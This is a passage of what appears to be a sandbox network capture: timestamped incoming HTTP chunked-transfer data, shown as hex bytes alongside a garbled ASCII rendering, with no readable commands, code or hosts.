2023-07-27 18:19:34 UTC	485	IN	Data Raw: 32 30 30 30 0d 0a 7f 7f 7f 7f 7f 7f 7f 7f c4 97 42 00 68 a9 48 00 68 a9 48 00 68 a9 48 00 68 a9 48 00 68 a9 48 00 68 a9 48 00 68 a9 48 00 c8 97 42 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 2000BhHhHhHhHhHhHhHB
2023-07-27 18:19:34 UTC	493	IN	Data Raw: 93 9e fc ec 1f 50 Data Ascii: P
2023-07-27 18:19:34 UTC	493	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	493	IN	Data Raw: 32 30 30 30 0d 0a 68 a3 7c 14 ee 0c 27 f6 af 49 1b d5 40 07 85 6c 5a c0 d9 bc 58 f3 7e 17 81 80 e4 f4 ef ed 27 fb a9 e5 3a ba 6e c0 fc ee d5 54 97 d4 ac 96 4c 86 e9 5f ff cb ef 80 1f 89 0a 12 4f a1 b4 39 f4 cf af 2d bf 1f 26 85 5b db d8 5c 35 89 4c 46 0a 28 f2 39 e9 3e a5 1b 54 bd 9a 8f 18 d3 da 9b 4c f3 8e 59 83 b0 6f 4c 69 1c 5a eb fe ca b0 52 b4 9d 51 b7 3e 7f b5 d7 f4 02 4d 65 24 7f 3e d8 49 19 15 1a bc 85 68 c7 c9 46 65 d0 ed 7d 08 bb b0 93 d1 41 ea 59 bc 41 b9 72 99 aa 3e 30 c7 36 ca c3 b7 13 a9 38 4d 90 fa bc 34 85 d4 65 bc 2a 99 90 05 ec 02 bf 06 7c 7b 46 29 70 6b b5 bd 41 d4 37 65 45 f4 34 aa 12 9d 18 0b fb 4f ad 7f bd 44 70 a1 46 18 bd 99 75 de ef 24 89 36 cc bd d9 34 16 b7 48 18 e2 5a 6c 4a 6c ed 57 48 fe 2a c4 e1 f8 8a fe 52 1a ee 1f 57 91 ca Data Ascii: 2000h\|'I@lZX~':nTL_O9-&[\5LF(9>TLYoLiZRQ>Me$>IhFe}AYAr>068M4e\|{F)pkA7eE4ODpFu$64HZlJlWHRW
2023-07-27 18:19:34 UTC	501	IN	Data Raw: 7e df ee 03 1c 2c Data Ascii: ~,
2023-07-27 18:19:34 UTC	501	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	501	IN	Data Raw: 32 30 30 30 0d 0a 7d a2 11 0e 94 46 45 16 c7 8f b0 21 af ee c9 0a 2f 05 8e b7 b8 a7 6f 93 7a cf 12 08 c9 33 4a c7 d8 18 64 72 8d 84 5c e6 25 6c 4e 23 6b 0c a8 1f 77 9c f1 19 81 29 67 29 07 09 41 c5 46 e6 c5 13 b3 0a 59 25 f7 9e d3 98 c7 9d 83 99 bf da c9 8f 81 90 a8 b2 1d 2e 62 e2 4a eb 48 1f 20 b4 a1 c4 34 90 0f 9f d1 ba de 3a 1e 26 00 30 0c bd 86 12 a1 f5 bb ca 6a 82 a4 a4 40 ed d8 1e 40 8b cd 37 e1 5b 11 fa b6 b5 af 57 36 52 f8 4a 7c e8 42 d4 f8 40 10 7d 3a 05 2d fa fd 09 86 40 92 de f6 00 88 96 5e 99 49 cb 6e 29 ba 8d 78 e7 5e 1c 9c 16 ac 1a 84 aa 9f 3d 26 b4 3b e5 e3 8b 3d b7 0a cd f5 2f e5 26 58 62 f5 bb 6b 99 d3 6c 06 31 db e6 1f 20 76 c4 dc ca bb 78 c3 1f 8c 26 98 fd 4b 40 19 b0 47 90 e9 1f 72 4b de 92 29 7c 96 cf 8a f9 38 9e a2 6f c4 d9 89 19 69 Data Ascii: 2000}FE!/oz3Jdr\%lN#kw)g)AFY%.bJH 4:&0j@@7[W6RJ\|B@}:-@^In)x^=&;=/&Xbkl1 vx&K@GrK)\|8oi
2023-07-27 18:19:34 UTC	509	IN	Data Raw: fd 1a cc f7 16 20 Data Ascii:
2023-07-27 18:19:34 UTC	509	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	509	IN	Data Raw: 31 66 66 38 0d 0a 5c ac 84 74 aa fa 07 ae 2e 41 9e 4a 27 16 07 3e 2b f2 09 f4 c9 5c 30 d3 4e 5a 55 23 da a1 28 a9 43 57 bb 5e 64 e5 29 ec 85 e2 7b 91 f0 e8 ae a3 0f e1 b1 50 80 fb 16 be de 75 84 4a 89 7b bb 4f 9e c5 09 15 d1 47 61 65 a1 d3 a9 48 b8 04 f8 1b f3 c3 04 99 a0 00 39 b7 13 89 1e 48 8e 1f 70 a3 24 5c 72 c6 9e aa 8a 29 53 dc 39 cd dd 90 08 1d be d3 f9 24 15 1b 72 5f 62 e4 70 44 67 23 a2 b0 c0 ab f9 35 af 36 cb 29 8f f6 ab cd df c4 13 3c 3c 53 8b c9 41 34 44 ce 2b a3 71 2e ca 7b aa 5b 3b a3 38 e4 7b a0 3d 66 90 c4 49 a7 71 4f d4 9f 53 8c e1 8e 02 7b e6 b7 65 f5 a0 39 b9 15 f7 82 74 88 18 63 ec 76 d8 bc e7 5b b3 8f 30 19 f0 cb c3 54 79 a2 18 2b 48 cd a1 6d a4 82 96 b3 fb 6e f7 af 62 c2 d0 1c 17 7a 46 08 c6 d8 98 75 5d da de c8 f6 d0 15 14 a7 59 8a Data Ascii: 1ff8\t.AJ'>+\0NZU#(CW^d){PuJ{OGaeH9Hp$\r)S9$r_bpDg#56)<<SA4D+q.{[;8{=fIqOS{e9tcv[0Ty+HmnbzFu]Y
2023-07-27 18:19:34 UTC	517	IN	Data Raw: 32 30 30 30 0d 0a Data Ascii: 2000
2023-07-27 18:19:34 UTC	517	IN	Data Raw: 76 d0 19 79 99 1d 67 0a d8 d1 ee ad a3 8d 3e 97 56 14 cd 7c 8e 21 12 0c 32 4e e9 84 9f fd 71 8d ad b8 89 17 cb 19 e2 60 f0 db f2 09 91 44 02 0a 9a 59 68 69 03 bb 89 07 5d 67 ac 6b 00 bf 56 d9 ce d3 4e 68 bc 42 81 03 32 07 f2 9e fb 2c ad d2 5a b9 35 24 f5 4f d8 8a 67 28 21 fc 64 64 15 54 89 9c 9e fe af 2f 2e df f5 57 5c ca be f3 e2 e5 86 7f 0f 59 a0 df e7 7a ff 4c 4e 50 9a 87 d6 d8 ce 3d 4d fa 9b 12 8e 4a bd 46 c0 9e be e3 45 fd b9 f1 8f 91 53 d8 a9 71 56 f5 83 26 2a 13 6f 4e d7 4e 92 ed b8 06 da 92 18 33 4a 10 b4 f3 38 91 b9 69 df d9 47 93 d0 33 20 8d 46 d6 cb d5 82 ea cd 3a b5 e9 f5 89 05 bc e5 0d d8 cc e8 34 d8 ea 29 02 6e 23 56 3e 45 1b 27 12 d7 f7 6e 0a d2 6d a3 9d 34 68 ed 7b cd cf 3d 47 1a 47 dd 41 c1 2f 66 c8 f0 0e 6b 26 fa d6 5b 25 f9 1f ef 67 a3 Data Ascii: vyg>V\|!2Nq`DYhi]gkVNhB2,Z5$Og(!ddT/.W\YzLNP=MJFESqV&*oNN3J8iG3 F:4)n#V>E'nm4h{=GGA/fk&[%g
2023-07-27 18:19:34 UTC	525	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	525	IN	Data Raw: 32 30 30 30 0d 0a a2 22 db b1 f9 2c 75 f7 45 d1 6d 6b e0 01 f3 38 b2 fe 43 c6 df 40 74 7f 53 f3 ab 4d 07 52 7a bd 7b 2b 85 e8 1c 4a e4 75 8f be ba e1 48 05 f9 09 c0 c5 ca c5 82 f2 d2 8c 94 13 3c b3 82 54 7b 58 5f 3a d9 df de 3f 4d 3a d0 dd df ef f1 9b 64 cd ca 17 76 d9 9c 90 85 7d 9d b6 8a ce 1a 19 8f 9b 78 7a 86 bb 3d 82 ac 97 27 62 7b 6b a1 5e 15 0d b7 d5 45 aa 48 e1 9e 1d 38 f5 ea fe 79 ec be 22 19 33 07 d2 a1 10 eb 29 0f d1 5f 26 86 72 f6 d1 e4 81 1c 62 6a 9f a5 53 d0 f8 bf 3b 3b 1f 66 0a c7 36 30 9c 8e 23 fa 66 9f a0 a7 de 37 2d d0 80 e8 44 a9 75 97 68 59 06 47 ff 0f 28 ed 42 c5 5b cf d7 ad c0 b8 6c fd c7 14 89 2a 6c 86 4a 40 81 70 9b eb ac e7 88 20 1d b3 f1 46 7e 3b 3c 98 2c b3 39 e7 c6 f0 eb ee 9a ab 5e 32 7b dd f4 ba 43 91 52 17 6c 53 23 5f bd 46 Data Ascii: 2000",uEmk8C@tSMRz{+JuH<T{X_:?M:dv}xz='b{k^EH8y"3)_&rbjS;;f60#f7-DuhYG(B[l*lJ@p F~;<,9^2{CRlS#_F
2023-07-27 18:19:34 UTC	533	IN	Data Raw: 44 4a d9 fd 12 77 Data Ascii: DJw
2023-07-27 18:19:34 UTC	533	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	533	IN	Data Raw: 32 30 30 30 0d 0a 9f 9c f0 07 d9 95 4a 5d c3 72 9e ff ae 9d 6e ea 26 70 00 e5 d2 d2 db 1b d8 28 3a 1d bc 1d fe 07 8f 6f fe 6e 00 aa 30 a8 d7 42 fc d8 53 e0 7c 5b b2 86 26 27 07 a8 32 41 c8 2f 0f 3b e3 f2 9f e7 ae 5d 55 38 27 d8 51 9f 25 07 89 c5 c8 6f 89 b8 5c 8b 35 b3 83 59 e6 df e0 c3 99 5b eb b0 1d 0a d0 6b 0a 50 da a2 42 5a c7 b5 3b e8 29 95 8e 4a d5 18 9a 60 0b b0 c4 54 31 35 4b 8e c3 f9 f2 e9 f8 70 87 e6 69 2f 4e 00 8b 03 12 8d 21 57 e8 f4 dc 28 51 f1 40 94 2c 23 96 f8 15 f4 12 a0 65 d7 9b 4f 45 f2 f7 b9 fa 2b be 1d 76 ea c5 a5 1e 5a 83 55 cd f5 ca ef 6d 02 af ae fc cb e5 63 b3 25 71 23 15 1d f3 35 36 9f 9b 73 67 44 ca 11 b1 b7 66 60 b1 4c 6a a3 1b a9 75 c5 a1 06 a7 78 8e dd 6c 7e 05 b3 38 63 e7 eb d3 11 e4 1f f4 ad af f1 6d fe 2d 84 b1 15 38 8e 43 Data Ascii: 2000J]rn&p(:on0BS\|[&'2A/;]U8'Q%o\5Y[kPBZ;)J`T15Kpi/N!W(Q@,#eOE+vZUmc%q#56sgDf`Ljuxl~8cm-8C
2023-07-27 18:19:34 UTC	541	IN	Data Raw: a5 bc 5e 4c fc 02 Data Ascii: ^L
2023-07-27 18:19:34 UTC	541	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	541	IN	Data Raw: 32 30 30 30 0d 0a 29 c7 bd 09 0a 47 30 df 27 c6 4b 7b dd bc 34 60 25 a0 3a 87 47 a8 96 60 64 75 ad 78 72 38 4e db ef 91 37 a5 96 af a2 4e 1b 98 26 55 9f f0 12 26 c6 09 e2 8c 34 e5 58 f1 e8 97 62 4b 8f 66 09 8b 1c 19 50 3d cb 80 ef fd 32 61 a4 6d fb c3 ea 3e 3f 1f f6 58 69 08 d9 d7 08 05 ca be ce ee 79 80 07 20 0c 1f c3 75 17 25 3c 1d e4 9b fa 1a 1f b9 2f 43 bd 21 dd 4d ca 63 08 1c ae 9a be e9 df b1 9e 93 24 48 63 fb d0 9f 7f dc 4b c4 7c d0 6a ba 1e 1d 48 9f 78 02 b5 32 88 37 0d 21 d1 c7 2d 31 8f d1 c7 5d 63 57 8d 7f d6 87 1f 4c f5 8a 2a 07 e0 07 a1 d0 e3 3f 5d 76 6c 85 48 27 3e 5a 35 b2 8f 1f 59 4c 72 aa a6 ab 2c 25 07 a2 6c ef 8c 3a a8 2f 28 38 ff f9 20 58 99 7f 65 93 94 ad 3d 25 f2 36 44 29 de 08 ed ba 98 56 33 ef 10 b1 88 a1 00 7d c4 61 23 47 e0 45 6a Data Ascii: 2000)G0'K{4`%:G`duxr8N7N&U&4XbKfP=2am>?Xiy u%</C!Mc$HcK\|jHx27!-1]cWL*?]vlH'>Z5YLr,%l:/(8 Xe=%6D)V3}a#GEj
2023-07-27 18:19:34 UTC	549	IN	Data Raw: e9 47 d2 e9 ea f4 Data Ascii: G
2023-07-27 18:19:34 UTC	549	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	549	IN	Data Raw: 32 30 30 30 0d 0a 37 42 e5 0e f6 31 d9 4b 0e 86 42 a2 78 8b 09 75 8e 7f 69 a5 67 e8 c8 23 43 cd 4a e8 0c 22 2b 0a 1c b6 ef b2 5b 17 89 bc 2d 0f c9 28 9d dc 42 a8 48 7e e5 56 f0 8a a0 12 c8 1c 60 32 29 de eb 28 d0 c3 35 47 07 47 ce d1 50 4d 99 d8 ca df f3 9d b0 2e d9 31 88 a6 0b 92 51 e7 06 54 77 5d 03 39 ba d5 b5 c8 14 6d 10 d0 13 14 7d 58 ca 86 89 83 af f2 d3 6e 24 1b f1 e9 38 d1 70 85 fa bf 34 be fe 37 62 43 fe 3f 97 5b 85 c8 51 10 37 a8 74 b1 04 69 2b ae 83 f6 d8 e8 df d5 21 63 44 38 41 c0 94 87 1e 13 8e 26 da 7f 3c 57 49 ef 69 b9 d5 77 84 15 2a df 47 41 54 d5 32 3b fc 08 ef 46 9c 07 ad c2 26 41 c8 11 7f a9 ea ec 66 8d 0f 00 f5 80 80 76 1c b0 da 92 7b 0a 60 88 34 1e a8 34 a2 ce 5f 23 40 21 bc 78 ce 43 77 08 9e ec 52 a9 a4 cc db 45 5f 56 97 cc f9 ee 61 Data Ascii: 20007B1KBxuig#CJ"+[-(BH~V`2)(5GGPM.1QTw]9m}Xn$8p47bC?[Q7ti+!cD8A&<WIiw*GAT2;F&Afv{`44_#@!xCwRE_Va
2023-07-27 18:19:34 UTC	557	IN	Data Raw: 34 87 51 6e 7a f4 Data Ascii: 4Qnz
2023-07-27 18:19:34 UTC	557	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	557	IN	Data Raw: 32 30 30 30 0d 0a 29 6e 9b d1 52 b0 21 f1 ad 17 ec 7a 25 b0 a0 3f 53 15 7c bc d2 de 94 ec 21 8c 5f b8 75 1c 82 1e 09 d3 03 30 54 b8 17 f7 ed e3 07 38 29 e2 17 3b 40 b1 2b 12 a7 34 95 50 2b 9f 61 9b 79 cc b4 90 90 34 f3 56 5b f6 34 a7 60 5d 80 4e e4 50 cc e3 0d 49 6e 01 4e 4e 4f 76 2e 46 26 52 b7 9e 85 aa 4a 76 d2 75 7d cb 88 58 a1 49 5c b3 02 47 94 ac f4 33 a3 a1 12 a1 86 61 0e f9 6a a3 be dd 87 01 d6 17 5b de b9 12 08 7f 01 45 e3 a3 2e c1 c5 47 64 e2 1b f0 24 1d 9b 0f ed 8f 80 15 d4 e8 e7 0c 8c 21 ad 6f fd b6 2e 9f 27 a6 4f 16 72 80 05 e1 17 2a 07 a1 da e6 7e a4 f8 56 ac 1a 0d 87 82 70 88 a9 14 d3 44 13 36 7b d4 e8 81 f6 39 1c a8 f9 ef 50 05 f0 33 93 e5 08 6c a5 6e 4a 0a a5 fe 43 81 1f 60 02 0d 1f 9b 4d 79 28 cc e9 0a 06 04 ef 98 53 c3 24 2e c2 41 f8 3d Data Ascii: 2000)nR!z%?S\|!_u0T8);@+4P+ay4V[4`]NPInNNOv.F&RJvu}XI\G3aj[E.Gd$!o.'Or*~VpD6{9P3lnJC`My(S$.A=
2023-07-27 18:19:34 UTC	565	IN	Data Raw: d0 d2 a3 56 18 d0 Data Ascii: V
2023-07-27 18:19:34 UTC	565	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	565	IN	Data Raw: 32 30 30 30 0d 0a 0b 07 60 a6 37 a5 24 b6 4e 79 b9 b6 2d a8 95 9e c6 86 67 a5 20 74 c3 56 16 69 a0 62 b7 c4 4b 55 3a 48 cf a3 00 b4 ed 6e fd 87 8f 06 45 f9 43 05 e1 84 08 e5 ad 09 94 63 76 57 e0 df 6a eb 25 a1 2b bd ef 90 76 b0 42 c6 06 e1 5b f7 7e a3 22 bb 10 26 ab 4d 35 73 ab ba 90 19 3a fb 28 4a bc 94 2b b2 ee 04 99 b0 89 c2 b2 b0 ea ec bf 4a 8f b6 09 4f 90 ae 83 73 d1 21 df ed e4 46 ee 3e c6 88 08 51 27 df da 5a df 2b 66 5a 3f 86 38 a5 bc 5f cf 71 13 22 17 17 b2 c0 32 9c 1d 5c 9a c4 aa f1 9b 3b 0c 87 73 33 f6 bb 2d 1b 8f d0 0b 93 5b 2a c3 36 91 60 84 b6 ef ba 6a 94 07 2b 94 2f 96 d0 40 b7 bc 45 3d ee 18 de 3c bd c9 3f 1f fe cf a5 3d c6 1c 5d 6e db 3c 54 89 6b 3d 8a e1 75 99 9e af 9d 71 d1 0e 0a f4 67 6c 8f e3 77 fa 1c 1a 3a 99 b9 ca 6e 3c d7 8e 96 bb Data Ascii: 2000`7$Ny-g tVibKU:HnECcvWj%+vB[~"&M5s:(J+JOs!F>Q'Z+fZ?8_q"2\;s3-[*6`j+/@E=<?=]n<Tk=uqglw:n<
2023-07-27 18:19:34 UTC	573	IN	Data Raw: 10 43 03 3b 87 28 Data Ascii: C;(
2023-07-27 18:19:34 UTC	573	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	573	IN	Data Raw: 31 66 66 38 0d 0a a4 23 10 08 19 86 5f 90 5d 79 bd f0 e9 3a dd 0b 10 b7 f4 1a 24 28 b1 16 cd 7f dd ab 33 12 ac fe b6 53 d7 65 64 88 24 03 66 6c d0 d3 a6 30 8a 26 8f 11 05 47 19 3d 46 51 02 6a 08 af d4 ff bd 66 c3 16 99 be 78 d5 b2 8e 2d 15 3c a7 19 4e 20 4a 5a 0d f8 4b 0c fa c0 8b c2 40 ff e7 0f 86 3f f2 35 71 5f 2c ec ae a5 22 96 ba 6b d2 dc 85 b1 4c 5b 64 75 fc 05 76 76 d0 33 b2 98 49 98 bc f1 27 3c 49 af 24 b0 b3 4e ea 19 71 ef a0 bb 53 1e a7 37 5b bc 4f c6 c9 7b 44 48 c7 6b 1d e2 e8 8d 74 f2 6d e0 a0 26 0f 30 b1 98 5e d4 32 01 4b 68 25 84 19 79 54 1e a7 9b dd f1 8b 9a 0f e4 b2 ad d1 f4 c8 f6 af e5 95 3a 2b 5c 89 97 f6 75 fc 19 3c ea f5 eb a6 b8 ba 18 c3 7e a8 37 c5 f8 f0 21 ab 13 d3 02 6a 44 ea 52 09 e5 b5 7b fa 95 ef 6c 2a 17 94 68 ee 33 af a0 10 db Data Ascii: 1ff8#_]y:$(3Sed$fl0&G=FQjfx-<N JZK@?5q_,"kL[duvv3I'<I$NqS7[O{DHktm&0^2Kh%yT:+\u<~7!jDR{l*h3
2023-07-27 18:19:34 UTC	581	IN	Data Raw: 32 30 30 30 0d 0a Data Ascii: 2000
2023-07-27 18:19:34 UTC	581	IN	Data Raw: a3 43 20 6e 1f 4c ea c4 af e6 96 10 5e fa 6e 1d f5 e1 39 55 90 05 4a e0 35 ed 7d 0f aa 96 b7 31 5a bf 2f 79 0c 30 da b0 5b bc 13 24 de 3f f5 6f ad f9 99 9a 1d 5f 46 22 cc 39 89 77 f9 9c 0d c3 64 ea 09 fb 42 b2 df 36 ad 13 a3 1a 37 db 95 3b 69 c3 c1 77 4e 03 c8 f6 39 31 59 b6 e3 93 dd cb cf 17 7a b6 ff 1a 72 df b9 78 2f 26 5a 06 52 da 38 77 fd 5e a2 60 dd a4 4b 55 ea bf 62 cd 4e 99 e0 2a c3 51 3b 50 16 dc 6c 8b 05 c9 9b 1f ab 31 e3 be 99 be 2f 00 e5 1d 70 4f 50 3b 26 8e b9 1a 39 2d de 87 69 84 d9 54 45 85 41 29 4e 55 71 ca 4d af 3c e5 96 ad 48 40 35 1c f6 e5 ee 47 4c de 06 fe 80 37 02 83 60 74 d5 2d 6d 58 a5 ee e9 b6 a5 8c 2e 9c 5a 2f fd c1 a1 32 6b 29 bc c4 cb e0 c6 dc 3d a7 d6 8a d3 aa 3c dd 87 47 e5 6a 50 4c d5 bd 4e 64 98 7b 57 d1 b8 d8 41 d9 52 75 44 Data Ascii: C nL^n9UJ5}1Z/y0[$?o_F"9wdB67;iwN91Yzrx/&ZR8w^`KUbN*Q;Pl1/pOP;&9-iTEA)NUqM<H@5GL7`t-mX.Z/2k)=<GjPLNd{WARuD
2023-07-27 18:19:34 UTC	589	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	589	IN	Data Raw: 32 30 30 30 0d 0a 81 ed 1f 7d 75 ea 4e aa 6c ed fe 3a cc 57 8d 71 80 55 93 f1 c5 00 59 63 d7 1c 43 b5 83 e1 50 b5 ab 43 42 c7 44 fa 3d 53 37 a1 ed 7a 28 25 97 7b f9 ae 8f 76 50 c3 e6 a9 5d 59 06 f7 77 6c 1d 8e 5d 1d ba a4 b9 9e 43 4f 63 74 22 ef af d3 c9 40 c0 a2 6d 57 38 f9 b7 62 48 bd f0 be 21 32 8e fa 4c c1 b5 78 91 8a 59 03 da 13 32 4e 90 3d 4e 05 28 9b 9c b0 d6 83 ca 6d b3 1f 1f c6 77 62 2a 55 fc 46 1f 36 b2 98 ec 30 63 49 cc f4 9e b8 6f 40 8e 1d ed ef 6f cc dc 48 48 f5 0f 46 80 d6 3e 0d 7b ec 03 68 38 3a 87 42 30 14 18 ba 35 31 90 e0 3d a2 c5 c8 35 e3 0e a0 21 55 62 1d d5 e8 d5 cc 93 f2 3c 02 45 34 dd 8b b9 f9 d4 f2 a4 00 d9 2a 91 2a 0a 8d db 4d 6e 92 34 77 3e 6d d6 82 25 cc eb 26 7b 36 a9 ec 93 a0 09 c9 a4 a2 99 cc d0 7d 4f 01 8d a0 9f 93 8f 8a c6 Data Ascii: 2000}uNl:WqUYcCPCBD=S7z(%{vP]Ywl]COct"@mW8bH!2LxY2N=N(mwbUF60cIo@oHHF>{h8:B051=5!Ub<E4*Mn4w>m%&{6}O
2023-07-27 18:19:34 UTC	597	IN	Data Raw: 87 54 ea 01 95 98 Data Ascii: T
2023-07-27 18:19:34 UTC	597	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	597	IN	Data Raw: 32 30 30 30 0d 0a fa f5 0e 53 c7 d7 a1 86 13 68 00 e2 9c 36 4e 2b 5c 63 3e 4d 4e 73 a7 a6 02 55 cb 5d 3d ca 56 a3 50 6e 15 27 5f 27 01 20 18 7b 02 fe 14 ed 84 17 63 ef 56 53 9f ff 33 c8 c9 5a 0b 44 6c b0 0b 6b fe d5 16 ec d5 c2 89 4c a8 e8 dd cd 75 51 ef 19 cb eb b7 99 7a 69 54 61 e5 3f b7 b9 0a 6e 70 84 7e d6 31 f6 19 df 75 aa cf e4 a6 74 e1 c1 cf 9a 2b b9 ab e5 be 47 9f 96 cc 7c a7 d9 ff 04 84 bc 36 d9 2f 57 99 e3 d5 f2 24 59 ff da 5e 1e 1c 17 a1 de 44 09 35 83 ff 51 a0 9d 75 22 b7 d0 78 77 b2 46 a9 20 3b c4 12 f2 74 b8 a3 0d 0c 12 3a cb 1e 22 3c 65 29 39 9c 83 00 da 66 2a 25 e6 e8 39 8a 93 35 e6 46 6b a6 64 9e c0 c9 a7 2e c1 02 bf 80 51 3c e4 7b 1c 1d e7 da cb 17 95 f9 d0 27 3b 30 7e 64 fd ef ca c7 c7 89 8b 67 13 9e 56 65 de 2e a6 84 f6 bc 15 65 96 a6 Data Ascii: 2000Sh6N+\c>MNsU]=VPn'_' {cVS3ZDlkLuQziTa?np~1ut+G\|6/W$Y^D5Qu"xwF ;t:"<e)9f*%95Fkd.Q<{';0~dgVe.e
2023-07-27 18:19:34 UTC	605	IN	Data Raw: 57 ae a2 b8 c4 5e Data Ascii: W^
2023-07-27 18:19:34 UTC	605	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	605	IN	Data Raw: 32 30 30 30 0d 0a 00 f8 20 1f c3 7d 05 79 69 e5 45 23 f3 10 95 57 82 37 14 cb 65 72 32 fb 3a 57 23 da a6 d1 54 9b 76 b1 e7 a0 ac d3 7d 9f bb b3 7c b4 21 96 f7 3a 21 ea a6 a9 49 1b 5a c8 0c 69 d7 47 fb e9 f3 1b 7a 88 a3 67 ae b4 1e 7a 3b 01 49 67 b0 7a 75 0e ce 1d 20 71 d9 0f cc 57 f1 14 e1 0e 54 5e bc 1a 19 03 88 c5 b4 29 bc 98 f9 81 f3 16 e7 74 c2 e1 c4 76 1e c0 10 92 80 63 6a e9 ed c5 58 17 7b 94 b8 96 01 df 57 08 b1 1f 10 a8 7d 91 ba 88 e8 b8 eb fd 8b c8 1f 02 7e a3 83 78 00 dc cd f1 44 a9 e6 4d b5 f4 83 98 a4 64 89 42 21 5d f3 ee 58 a0 63 cc 44 67 17 a1 3a f2 b6 bb ca 23 e5 5e 57 20 9e 0e 5d ec 8d 2a a9 63 1c 77 1a cc b4 e5 ff e8 5b a4 57 f4 9d 6e 57 97 a9 64 d9 c4 2b e9 10 c7 d1 e6 02 9d 59 a4 99 39 ff c1 43 28 3a 7f ff 2f 93 25 e4 53 60 46 ad 2f 0c Data Ascii: 2000 }yiE#W7er2:W#Tv}\|!:!IZiGzgz;Igzu qWT^)tvcjX{W}~xDMdB!]XcDg:#^W ]*cw[WnWd+Y9C(:/%S`F/
2023-07-27 18:19:34 UTC	613	IN	Data Raw: db 6c 39 34 52 1e Data Ascii: l94R
2023-07-27 18:19:34 UTC	613	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	613	IN	Data Raw: 32 30 30 30 0d 0a 15 59 a5 c0 46 24 48 d8 13 a8 b7 b4 df c6 83 24 8e f7 23 c3 d3 cf 4d 25 a5 10 53 7d c7 00 b7 5e e6 cb 6e 82 7d a9 b4 a9 60 a5 6c a6 83 48 92 1f 60 a5 7d b8 68 40 9d 8a 68 d2 49 eb 63 1a 5e 77 1d f9 e2 6c 7b b4 d5 f6 54 7c 7b 49 52 10 6c 67 b0 20 db 8a 1c 3b 8c 9e 79 6d 73 b2 d1 8a b4 2b 72 bc 94 6c d7 7b a0 fd 34 8f 6e 25 a0 bf ce 31 2b e3 64 5d ee 02 71 c6 c4 3e c2 f9 a2 c7 f4 53 1e d1 f6 5b 94 5a 83 53 a5 83 70 d3 8c 91 60 a6 c1 48 d4 65 e6 25 ff 15 fd b9 19 96 8f 60 9b e6 6b 1c 5f 09 98 15 60 31 f7 c9 37 66 da f5 13 2e 0e ee 7f 2e b7 1e 57 90 01 73 91 8f e1 25 1c bc 7d 03 d2 3b b4 9c 49 bb ba 52 d2 07 8b 17 ab 0b 7b d2 50 4b 06 2c 9e 36 0c 12 f3 3e 4b 77 1b 36 19 b2 8b 08 6b 62 71 26 2a 13 e1 d4 9f 70 fd fb 6c 29 01 d4 ba 6a f8 b9 ff Data Ascii: 2000YF$H$#M%S}^n}`lH`}h@hIc^wl{T\|{IRlg ;yms+rl{4n%1+d]q>S[ZSp`He%`k_`17f..Ws%};IR{PK,6>Kw6kbq&*pl)j
2023-07-27 18:19:34 UTC	621	IN	Data Raw: 09 45 d8 ca e1 8e Data Ascii: E
2023-07-27 18:19:34 UTC	621	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	621	IN	Data Raw: 32 30 30 30 0d 0a 24 ef 6b 08 37 70 b6 03 2d 3a d4 cb 33 8f b0 25 09 ee b2 e3 32 12 c1 19 b1 94 78 b8 0c 09 cb 62 1b e8 a5 67 d4 aa 81 7e 6e c5 46 49 f8 61 9c 0a 11 d0 64 4e 9c 38 d9 71 ae 03 1a be 64 5a 3e 68 87 df 38 32 65 89 b1 bf 94 73 50 b8 44 fa f1 be aa 02 f2 7f 2a d4 0c 76 a2 e8 8f d9 1b c5 76 ee 56 76 46 4a 06 05 75 03 30 75 70 d4 d4 a2 43 93 38 b2 b6 68 ef 37 12 fa 37 79 56 73 50 c3 99 fe b3 2a 56 0e cd 2d 8a 1f 38 e8 28 f0 38 96 58 00 9d f2 f6 82 f0 a8 4d af ae a5 44 92 d6 fb 1e d4 ca ec a4 c3 f3 47 6f 0f f8 37 86 a4 19 1f fa b1 d6 bf 0e ad af 15 28 35 b4 c6 4b 1f 69 c0 d5 36 45 9c b1 16 3c f8 09 6f 11 5d 23 25 1e 73 3b 66 99 d5 f1 82 fb de 62 49 02 0f 4d 3e 34 b4 a7 17 3b 39 b2 d2 51 9e 30 f0 57 95 36 c5 03 60 7b 8b 55 9e 66 a2 f4 52 63 06 79 Data Ascii: 2000$k7p-:3%2xbg~nFIadN8qdZ>h82esPDvvVvFJu0upC8h77yVsPV-8(8XMDGo7(5Ki6E<o]#%s;fbIM>4;9Q0W6`{UfRcy
2023-07-27 18:19:34 UTC	629	IN	Data Raw: 3b d2 b5 d9 4a ca Data Ascii: ;J
2023-07-27 18:19:34 UTC	629	IN	Data Raw: 0d 0a Data Ascii:
